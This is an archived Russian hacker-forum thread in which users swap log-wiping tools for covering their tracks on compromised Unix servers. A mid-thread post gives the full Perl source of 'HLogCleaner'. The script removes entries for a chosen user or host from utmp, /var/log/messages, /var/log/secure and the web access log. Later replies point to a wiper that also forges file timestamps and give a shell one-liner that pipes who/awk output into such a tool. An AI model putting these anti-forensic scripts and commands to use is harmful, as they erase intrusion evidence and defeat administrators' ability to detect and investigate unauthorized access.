Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   А как ВЫ чистите логи? (https://forum.antichat.xyz/showthread.php?t=18001)

drmist 21.04.2006 14:41
А как ВЫ чистите логи?
 
Собственно сабж.
Я обычно использую Vanish2, но у каждого логвайпера есть сови минусы и плюсы.
Хочу знать мнение остальных.
Кроме того, тема будет полезна для тех, кто логи НЕ чистит ))

+toxa+ 21.04.2006 14:56
Аналогично ванишем)

Desr0w 21.04.2006 14:58
Юзаю тож ваниш.
Фряхи и т.д не рутал,логвайперов под них не юзал.

SanyaX 21.04.2006 15:03
Ванишь использую. Пока лучше не чего не видел.

Rebz 21.04.2006 15:14
Для приличия ссылочку на ваниш бы скинули =))

Desr0w 21.04.2006 15:21
Vanish2

haZard0us 21.04.2006 16:32
#!/usr/bin/perl
# ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
# ' HATS Security Team http://security.nitro.ru '
# ' '
# ' HLogCleaner [hlogcleaner_0.1_pub.rar] '
# ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
# ' [v 0.1 public] '
# ' '
# ' Copyright © 2005-2006 Dmitri Gavrilov '
# ' '
# ' Released under the terms & conditions of v2 of the GNU General '
# ' Public License. For details refer visit http://gnu.org '
# ' '
# ' [version 0.1] >> Первый релиз '
# ' '
# ' <info> '
# ' Программа для очистки бинарных и текстовых лог-файлов '
# ' '
# ' Coded by GeW [zionix@mail.ru] '
# ' Greets to all HATS Security Team members '
# ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
use Getopt::Std;
use Socket;
if (@ARGV < 1) { &help; }
getopt("uh");
if ($ARGV[0] = "1")
{
print "\n[ start cleaning ]\n";
binary("/var/run/utmp");
print "[ stop cleaning ]\n";
}
if ($ARGV[0] = "2")
{
print "\n[ start cleaning ]\n";
ascii("/var/log/messages");
print "[ stop cleaning ]\n";
}
if ($ARGV[0] = "3")
{
print "\n[ start cleaning ]\n";
ascii("/var/log/secure");
print "[ stop cleaning ]\n";
}
if ($ARGV[0] = "4")
{
print "\n[ start cleaning ]\n";
ascii("/usr/local/www/logs/access_log");
print "[ stop cleaning ]\n";
}
if ($ARGV[0] = "5")
{
print "\n[ start cleaning ]\n";
binary("/var/run/utmp");
ascii("/var/log/messages");
ascii("/var/log/secure");
ascii("/usr/local/www/logs/access_log");
print "[ stop cleaning ]\n";
}
sub binary
{
use User::Utmp qw(utmpname getut putut);
$file = shift;
utmpname($file);
@utmp = getut();
open(TMP,">/tmp/.tmp");
close(TMP);
utmpname("/tmp/.tmp");
foreach $entry (@utmp)
{
putut($entry)
if ($entry->{"ut_user"} ne $opt_u && $entry->{"ut_host"} ne $opt_h);
}
system("mv /tmp/.tmp $file");
return 1;
}
sub ascii
{
$file = shift;
open(READ,"$file");
open(WRITE,">/tmp/.tmp");
while(<READ>)
{
print WRITE $_
if ($_!~/$opt_h/);
}
system("mv /tmp/.tmp $file");
}
sub help
{
print "\n";
print (<<"end");
================================================== =================
HATS Log Cleaner [version 0.1 public]
Coded by GeW [zionix@mail.ru]
Greets to all HATS Security Team members
usage: perl hlogcleaner.pl <cleaning type>
types: 1 - /var/run/utmp [binary]
2 - /var/log/messages [ascii]
3 - /var/log/secure [ascii]
4 - /usr/local/www/logs/access_log [ascii]
5 - all cleaning types
example: perl hlogcleaner.pl 5
================================================== =================
end
exit();
}


=======================

много багов, но работа над ним кипит=)

limpompo 21.04.2006 16:42
Использую только всои чистильщики

Fashion 21.04.2006 16:59
руками

drmist 21.04.2006 18:41
Fashion
Тогда давай подробнее - все кругом сгорают от любопытства :)))

Desr0w 21.04.2006 18:44
Цитата:
Сообщение от drmist
Fashion
Тогда давай подробнее - все кругом сгорают от любопытства :)))
Да,мне чесное слово тоже очень интересно...
Мы ведь лохи-юзаем логклинеры...
Настоящие Х всё делают руками.

Desr0w 21.04.2006 19:02
Я вот тут случайно наткнулся на статью о логвайперах.
read

max_pain89 21.04.2006 19:43
я юзаю от XasClan'a

rent0n 21.04.2006 20:42
Цитата:
Сообщение от Desr0w
Да,мне чесное слово тоже очень интересно...
Мы ведь лохи-юзаем логклинеры...
Настоящие Х всё делают руками.
Да ты прав б/п.
Посмотри мою статейку про очистку бинарных логов /var/run/utmp, /var/log/lastlog и /var/log/wtmp в разделе статьи...Там еще исходник есть неболшой проги, которая не только удаляет необоходимую запись, но и меняет дату изменения файла. Вот ссыла на статью http://forum.antichat.ru/thread15355.html

kot777 23.04.2006 09:16
Юзаю логвайпер от лимпомпо, на своем велосипеде кататься приятней, так сказать.

Morph 23.04.2006 13:32
Вантусом подчищаю, т.к больше нечего не юзал.

trick-aza 24.04.2006 00:53
Народ Vanish хорошая штука но иногда она почему то не работает(не надо говорить что chmod не с тем битом, дело не в этом ... есть ядра 2.4 которые не ломаются) - дак вот на такой случай Альтернатива это Stealth - бинраный и текстовой. Последнее время юзаю только его.

budden 07.04.2009 10:57
юзаю логвайпер от rent0n, ему требуются параметры:

logwipe <name> <host> <terminal>
Соотв-щие <name> <host> <terminal> я получаю такой командой:
who | awk '/root/{sub(/\(/,""); sub(/\)/,"");print $1, $5, $2}'

Теперь вопрос, можно ли как-нибудь эти команды объединить в одну строку?

who | awk '/root/{sub(/\(/,""); sub(/\)/,"");print $1, $5, $2}' | logwipe - не работает. Как вывод моей конструкции подать как параметры для запуска logwipe?

X-3 07.04.2009 12:07
Сейчас юзаю cron, раньше - ручками.

pop_korn 07.04.2009 14:31
Цитата:
who | awk '/root/{sub(/\(/,""); sub(/\)/,"");print $1, $5, $2}' | logwipe - не работает. Как вывод моей конструкции подать как параметры для запуска logwipe?
# logwipe `who | awk '/root/{sub(/\(/,""); sub(/\)/,"");print $1, $5, $2}' `


Время: 13:38